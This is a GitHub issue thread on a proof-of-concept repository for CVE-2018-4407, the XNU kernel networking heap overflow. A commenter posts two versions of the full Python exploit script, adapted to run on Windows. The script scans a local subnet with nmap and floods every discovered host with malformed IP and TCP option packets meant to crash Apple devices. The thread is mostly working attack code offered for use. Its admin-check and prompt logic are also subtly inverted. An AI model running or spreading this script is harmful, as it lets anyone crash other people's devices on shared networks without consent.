search

zteeed / CVE-2018-4407-IOS

POC: Heap buffer overflow in the networking code in the XNU operating system kernel
13 stars 1 forks source link

Here's how to get it to work on windows #2

Open FilterUnfiltered opened 5 years ago

FilterUnfiltered commented 5 years ago

Simply, on line 25-26 you see this:

if not os.geteuid() == 0:
    sys.exit('\nscapy requires root privileges.\n')

first, import ctypes at the beginning; import ctypes then, replace lines the current perms checking with this to make it multi-platform:

try:
    if not os.geteuid() == 0:
        sys.exit('\nscapy requires root privileges.\n')
except AttributeError:
    if not ctypes.windll.shell32.IsUserAnAdmin() == 0:
        sys.exit('\nscapy requires root privileges.\n')

the final code should look like this:

#! /usr/bin/python3

import ctypes
import os
import time
import nmap
import struct
from scapy.all import *

def attack(src='192.168.1.95', subnet='192.168.1.0/24'):
    print ("Scanning network, please wait...")
    nm = nmap.PortScanner()
    nm.scan(hosts=subnet, arguments='-sP')
    print ("Done with nmap configs...")
    list_of_ips = nm.all_hosts()
    list_of_ips = sorted(list_of_ips, key=lambda ip: struct.unpack("!L", inet_aton(ip))[0])
    print ("Done enumerating list...")
    payload = ""
    for i in range(40):
        payload+="x"
        for host in list_of_ips:
            print("[*] Sending Payload to "+host+" | Payload: "+payload)
            send(IP(src=src, dst=host, options=payload)/TCP(options=[(19,"x"*18),(19,"x"*18)]))
            time.sleep(0.2)

if __name__ == '__main__':
    try:
        try:
            if not os.geteuid() == 0:
                sys.exit('\nscapy requires root privileges.\n')
        except AttributeError:
            if not ctypes.windll.shell32.IsUserAnAdmin() == 0:
                sys.exit('\nscapy requires root privileges.\n')
        isdefault = input('Default mode configuration:\nYour IP: 192.168.1.95\nYour subnet: 192.168.1.0/24\nGo to custom configuration ? ["yes"/"no"] ')
        if isdefault=='no':
            attack()
        else:
            src = input('What is YOUR IP address ? (example: 192.168.1.95) ')
            subnet = input('What is the subnet address ? (example: 192.168.1.0/24) ')
            attack(src=src, subnet=subnet)
    except KeyboardInterrupt:
        print('\nInterrupted\n')
        try:
            sys.exit(0)
        except SystemExit:
            os._exit(0)
zteeed commented 5 years ago

thanks, you can make a pull request if you want ;)

FilterUnfiltered commented 5 years ago

dude nah I tested it and it didn't work, my current working code (without having to open as admin, weirdly) is this:

#! /usr/bin/python3

import ctypes
import os
import time
import nmap
import struct
from scapy.all import *

def attack(src='192.168.1.7', subnet='192.168.1.0/24'):
    print ("Scanning network, please wait...")
    nm = nmap.PortScanner()
    nm.scan(hosts=subnet, arguments='-sP')
    print ("Done with nmap configs...")
    list_of_ips = nm.all_hosts()
    list_of_ips = sorted(list_of_ips, key=lambda ip: struct.unpack("!L", inet_aton(ip))[0])
    print ("Done enumerating list...")
    payload = ""
    for i in range(40):
        payload+="x"
        for host in list_of_ips:
            print("[*] Sending Payload to "+host+" | Payload: "+payload)
            send(IP(src=src, dst=host, options=payload)/TCP(options=[(19,"x"*18),(19,"x"*18)]))
            time.sleep(0.2)

if __name__ == '__main__':
    try:
        #try:
        #    if not os.geteuid() == 0:
        #        sys.exit('\nscapy requires root privileges.\n')
        #except AttributeError:
        #    if not ctypes.windll.shell32.IsUserAnAdmin() == 1:
        #        sys.exit('\nscapy requires root privileges.\n')
        attack()
    except KeyboardInterrupt:
        print('\nInterrupted\n')
        try:
            sys.exit(0)
        except SystemExit:
            os._exit(0)
zteeed commented 5 years ago

I will make some test with a Windows in order to improve the code